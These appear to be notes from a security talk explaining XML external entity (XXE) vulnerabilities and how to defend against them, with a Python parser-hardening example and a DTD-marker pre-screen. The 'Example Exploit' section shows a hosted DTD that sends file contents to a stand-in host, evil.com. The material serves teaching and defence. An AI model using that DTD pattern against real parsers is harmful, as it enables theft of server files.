XXE For Dummies
XML eXternal Entities
Notes from the BSidesPDX talk by @brimy, a great introduction to how XXE vulnerabilities operate. Video posted
Added to the OWASP Top 10 in 2017.
Entities
HTML "entities" are the usual entry point: an encoded reference such as
&amp; -> &
is expanded when the document is rendered, and that expansion is what triggers the behaviour.
XML has User-Defined Entities
<!ENTITY xml "Extensible Markup Language">
External Entities
<!ENTITY chapter1 SYSTEM "chapter1.txt">
When the entity is referenced, the parser fetches chapter1.txt and substitutes its contents into the document.
If an attacker controls the XML, this lets them make the parser read files or URLs at parse time and return sensitive data.
Example Exploit
Hosted DTD: evil.com/evil.dtd. Resulting request made by the victim parser: http://evil.com/evil.htm?payload=&file;
Contents of evil.dtd:
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"
>
%all;
(%file; is a parameter entity declared in the submitted XML document itself; that part is not reproduced in these notes.)
Threat Model Questions to Ask
- Does your server allow DTDs? .NET is one of the primary offenders: .NET < 4.5.2 is vulnerable in its default configuration.
- Do you allow external entities? (You shouldn't.)
- Do you validate untrusted input? (You always should.)
DO: update parsers, disable DTDs and external entity resolution, validate input, and where URL resolution is genuinely needed set policies restricting which URLs may be resolved.
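The following is an added example, not code from the talk or its slides, showing what "disable DTD & XXE" looks like in a concrete parser, and how a parser configured this way handles the external entity declaration and hosted-DTD reference described above. It uses Python's stdlib expat binding; the sample documents are constructed here (the `chapter1.txt` entity and the `evil.com/evil.dtd` reference are taken from the notes, everything else is made up for the example). A DOCTYPE, an ENTITY declaration or an external entity reference is refused the moment the parser sees it, before anything could be resolved or fetched; a cheap byte-level pre-screen is included as a logging/alerting signal, not as the control.

```python
import xml.parsers.expat

# Constructed sample inputs (not from the talk): a harmless document, one with an
# internal-subset external entity, and one that points at a hosted external DTD.
BENIGN_XML = b'<?xml version="1.0"?><order><item>widget</item></order>'
XXE_XML = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [ <!ENTITY chapter1 SYSTEM "chapter1.txt"> ]>\n'
    b'<order><item>&chapter1;</item></order>'
)
EXTERNAL_DTD_XML = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order SYSTEM "http://evil.com/evil.dtd">\n'
    b'<order><item>widget</item></order>'
)


class DtdNotAllowed(ValueError):
    """Raised when untrusted XML contains a DOCTYPE or entity declaration."""


def parse_untrusted(xml_bytes):
    """Parse untrusted XML with DTD and entity processing refused outright.

    Returns a list of (tag, text) pairs in document order. Raises
    DtdNotAllowed as soon as the parser meets a DOCTYPE, an ENTITY
    declaration or an external entity reference, i.e. before any entity
    could be expanded or any file or URL fetched.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True  # deliver each text node in a single callback

    # Parameter entities (the %all; / %file; trick above) are never expanded.
    parser.SetParamEntityParsing(
        xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE %r refused (DTDs disabled)" % name)

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdNotAllowed("ENTITY %r refused" % name)

    def reject_external(context, base, sysid, pubid):
        raise DtdNotAllowed("external entity %r refused" % sysid)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    collected = []
    open_tags = []

    def start(tag, attrs):
        open_tags.append(tag)

    def end(tag):
        open_tags.pop()

    def text(data):
        if data.strip():
            collected.append((open_tags[-1], data.strip()))

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(xml_bytes, True)
    return collected


def is_rejected(xml_bytes):
    """True if the hardened parser refuses the document, False if it parses."""
    try:
        parse_untrusted(xml_bytes)
    except DtdNotAllowed:
        return True
    return False


def dtd_markers(xml_bytes):
    """Pre-screen for logging/alerting: which DTD constructs appear in the
    first 4 KiB of raw bytes. A detection signal at a gateway or in a WAF
    rule, not a substitute for the parser configuration above."""
    head = xml_bytes[:4096].upper()
    return [m for m in (b"<!DOCTYPE", b"<!ENTITY") if m in head]


if __name__ == "__main__":
    print(parse_untrusted(BENIGN_XML))
    for sample in (XXE_XML, EXTERNAL_DTD_XML):
        print(dtd_markers(sample), "rejected:", is_rejected(sample))
```

The design choice worth noting: the hosted-DTD case is refused at the DOCTYPE declaration itself, so the parser never issues the request to evil.com at all, which is the property you want from "disable DTD" rather than merely "don't resolve external entities".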